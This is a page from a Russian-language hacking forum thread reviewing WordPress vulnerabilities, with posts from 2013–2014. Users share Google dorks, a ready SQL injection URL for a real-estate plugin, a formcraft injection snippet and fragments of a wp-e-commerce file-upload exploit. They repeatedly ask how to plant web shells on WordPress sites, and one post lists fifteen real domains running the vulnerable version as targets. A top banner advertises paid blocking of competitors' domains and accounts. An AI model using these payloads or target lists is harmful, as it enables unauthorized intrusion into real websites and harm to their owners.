УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
[ Обзор уязвимостей WordPress ]

Страница 29 из 39

« Первая

Последняя »

Опции темы

Поиск в этой теме

Опции просмотра

#281

16.09.2013, 00:08

psihoz26

Guest

Сообщений: n/a

Провел на форуме:
182660

Репутация: 324

очередная возможность узнать версию вордпресс

файл redame.html в корневой папке с блогом

пример

http://www.lasalle.edu/readme.html

http://www.blackandabroad.com/readme.html

#282

01.11.2013, 06:16

BOSS

Новичок

Регистрация: 15.06.2010

Сообщений: 0

Провел на форуме:
16546

Репутация: 0

Извиняюсь если не туда пишу, можно ли залить шелл на вордпресс 3.7.1 если нет прав на запись файлов?

#283

10.11.2013, 21:06

qaz

Guest

Сообщений: n/a

Провел на форуме:
344922

Репутация: 75

Цитата:

Сообщение от psihoz26

psihoz26 said:
Google dork:

Код:

Code:
inurl:"wp-content/plugins/fs-real-estate-plugin/xml/marker_listings.xml?id="

Vulnerable script:

Код:

Code:
h**p://WordPress.eX/wp-content/plugins/fs-real-estate-plugin/xml/marker_listings.xml?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,COLUMN_NAME,TABLE_NAME,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+FROM+INFORMATION_SCHEMA.COLUMNS+--+

это до какой версии работало?

#284

11.12.2013, 19:24

Ravenous

Guest

Сообщений: n/a

Провел на форуме:
44130

Репутация: 26

formcraft Plugin Sql Injection

файл /wp-content/plugins/formcraft/form.php

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][COLOR="#0000BB"]get_results[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT * FROM[/COLOR][COLOR="#0000BB"]$table_builder[/COLOR][COLOR="#DD0000"]WHERE id=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]id[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"ARRAY_A"[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$con[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]stripslashes[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$myrows[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'con'[/COLOR][COLOR="#007700"]]);

[/COLOR][COLOR="#0000BB"]$con[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]json_decode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$con[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]);

[/COLOR][/COLOR]

inurl:"plugins/formcraft/"

#285

20.12.2013, 14:11

hpol

Guest

Сообщений: n/a

Провел на форуме:
21252

Репутация: 15

какой есть еще способ залиться в wp ?

при загрузке плагина просит пароль от ftp, имеющиеся плагины нельзя изменить, нет прав на запись.

#286

22.12.2013, 21:56

BigBear

Новичок

Регистрация: 04.12.2008

Сообщений: 11

Провел на форуме:
69033

Репутация: 8

Цитата:

Сообщение от hpol

hpol said:
какой есть еще способ залиться в wp ?
при загрузке плагина просит пароль от ftp, имеющиеся плагины нельзя изменить, нет прав на запись.

Сейчас как раз дописываю одну вещь по аплоаду в WP.

Если есть желание и трудный сайт - помогу в рамках тестирования продукта в ПМ.

#287

27.01.2014, 16:56

vr4nonymous

Guest

Сообщений: n/a

Провел на форуме:
322

Репутация: 0

Custom Content Type Manager

Код:

Code:
url : http://yoursite.com/wp-content/plugins/custom-content-type-manager/ajax-controllers/download_def.php

скачать .json

вид Admin Email

#288

30.01.2014, 13:06

xPriZrAkx

Познающий

Регистрация: 16.03.2007

Сообщений: 48

Провел на форуме:
293334

Репутация: 39

Цитата:

Сообщение от hpol

Когда просит пасс итд все равно все залилось Пробуй

#289

01.02.2014, 18:17

SuNDowN

Участник форума

Регистрация: 31.03.2008

Сообщений: 160

Провел на форуме:
706093

Репутация: 97

Отправить сообщение для SuNDowN с помощью ICQ

Wordpress Plugin (wp-e-commerce v3.8.9.5) Multiple Vulnerabilities

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][COLOR="#DD0000"]"@[/COLOR][COLOR="#0000BB"]$uploadfile[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"]));

[/COLOR][COLOR="#0000BB"]curl_setopt[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$ch[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]CURLOPT_RETURNTRANSFER[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]curl_setopt[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$ch[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]CURLOPT_HTTPHEADER[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$headers[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$postResult[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]curl_exec[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$ch[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]curl_close[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$ch[/COLOR][COLOR="#007700"]);

print[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#0000BB"]$postResult[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]?>[/COLOR][/COLOR]

©Взято от Сюда

Вот только не заливается шелл немогу понять в чём причина, кто разберется будьте добры помочь, вот Вам домены для теста:

Код:

Code:
http://1CCLUB.RU/wp-content/plugins/wp-e-commerce/readme.txt
http://40MOBILE.RU/wp-content/plugins/wp-e-commerce/readme.txt
http://4WR.RU/wp-content/plugins/wp-e-commerce/readme.txt
http://9899669.RU/wp-content/plugins/wp-e-commerce/readme.txt
http://AFSERVICE.RU/wp-content/plugins/wp-e-commerce/readme.txt
http://AISBERG24.RU/wp-content/plugins/wp-e-commerce/readme.txt
http://ALL-HTC.RU/wp-content/plugins/wp-e-commerce/readme.txt
http://ALTERKRESLA.RU/wp-content/plugins/wp-e-commerce/readme.txt
http://AMARTCOM.RU/wp-content/plugins/wp-e-commerce/readme.txt
http://angel23.ru/wp-content/plugins/wp-e-commerce/readme.txt
http://ANTIKFOREVERY1.RU/wp-content/plugins/wp-e-commerce/readme.txt
http://APIKLIN.RU/wp-content/plugins/wp-e-commerce/readme.txt
http://APK-NN.RU/wp-content/plugins/wp-e-commerce/readme.txt
http://ARCHIMEDNOV.RU/wp-content/plugins/wp-e-commerce/readme.txt
http://ARENDAMD.RU/wp-content/plugins/wp-e-commerce/readme.txt

Домены именно той версии которую требует уязвимость.

#290

15.02.2014, 02:19

grimnir

Guest

Сообщений: n/a

Провел на форуме:
216062

Репутация: 231

Есть админка вордпресс , как залить шелл? Редактировать файлы 404 и другие запрещено (нет прав на запись файлов темы) плагин не устанавливается( нужна авторизация FTP ) WP ниже 3.8.1

Совет от xPriZrAkx не помог ,он просто при нажатии просит пароль и не заливает

Способ с 2 админами тоже не катит

Страница 29 из 39

« Первая

Последняя »

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Обзор уязвимостей CMS [Joomla,Mambo] и их компонентов	it's my	Веб-уязвимости	361	24.10.2019 10:25
[ Обзор уязвимостей PHP-Nuke ]	[53x]Shadow	Веб-уязвимости	43	04.02.2012 20:33
[ Обзор уязвимостей SLAED CMS ]	_kREveDKo_	Веб-уязвимости	20	01.11.2009 14:28
ОБЗОР УЯЗВИМОСТЕЙ БЕСПЛАТНЫХ ПОЧТОВЫХ СЕРВИСОВ	nike57	Уязвимости Mail-сервис	4	05.05.2006 22:03
Статья обзор уязвимостей бесплатных почтовых сервисов	markel	Уязвимости Mail-сервис	3	12.09.2005 10:07

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход